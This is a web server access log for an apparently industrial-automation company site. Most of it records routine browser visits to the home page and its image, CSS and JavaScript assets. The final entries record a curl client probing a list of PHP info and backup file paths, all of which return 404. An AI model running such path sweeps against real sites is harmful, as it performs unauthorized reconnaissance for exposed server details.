-[16/Feb/2026:08:57:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:57:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:57:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:57:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:57:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:57:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18111] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:57:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:08:57:13 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:09:29:49 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:09:29:49 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/assets/images/BatchControl.png" -[16/Feb/2026:09:35:39 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:09:35:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18116] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:09:35:39 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:09:38:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10011] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:09:38:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:09:38:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:09:38:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:09:38:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:09:38:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:09:38:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:09:38:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:09:38:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:09:38:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:09:46:23 +0000] - - 301 - HEAD http www.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[16/Feb/2026:09:46:23 +0000] - - 301 - HEAD http www.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[16/Feb/2026:09:59:20 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:09:59:20 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:09:59:20 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:09:59:20 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:09:59:20 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:09:59:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:10:00:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9986] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:10:00:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:10:00:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:10:00:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:10:00:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:10:00:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:10:00:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:10:00:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:10:00:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:10:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2315688] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:10:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:10:04:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9986] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:10:04:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:10:04:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:10:04:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:10:04:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:10:04:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:10:04:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:10:04:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:10:04:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:10:04:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:10:04:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:12:00:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 9986] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[16/Feb/2026:12:00:56 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:12:00:56 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:12:00:56 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:12:00:56 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:12:00:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 211.234.204.1] [Length 18119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:12:00:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 211.234.204.1] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:12:47:32 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:12:47:32 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:12:47:32 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:12:47:32 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:12:47:32 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:12:47:32 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:12:47:32 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:14:21:26 +0000] - - 301 - GET http www.hanmocnn.co.kr "/" [Client 64.227.134.113] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" -[16/Feb/2026:14:21:26 +0000] - - 301 - GET http www.hanmocnn.co.kr "/favicon.ico" [Client 64.227.134.113] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "http://www.hanmocnn.co.kr/" -[16/Feb/2026:14:21:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 64.227.134.113] [Length 9999] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" -[16/Feb/2026:14:21:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 64.227.134.113] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:15:09:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 185.177.72.38] [Length 9999] [Gzip 5.07] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:09:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/info.php.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:09:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/php-info.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:09:56 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/newinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:09:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/siteinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:09:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/info.php.1" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:09:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/admin/phpinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:09:57 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/pageinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:09:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/info.php.back" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:09:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpbb/phpinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:09:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/release_info.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:09:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test/info.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:09:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/info" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:09:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/info.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" 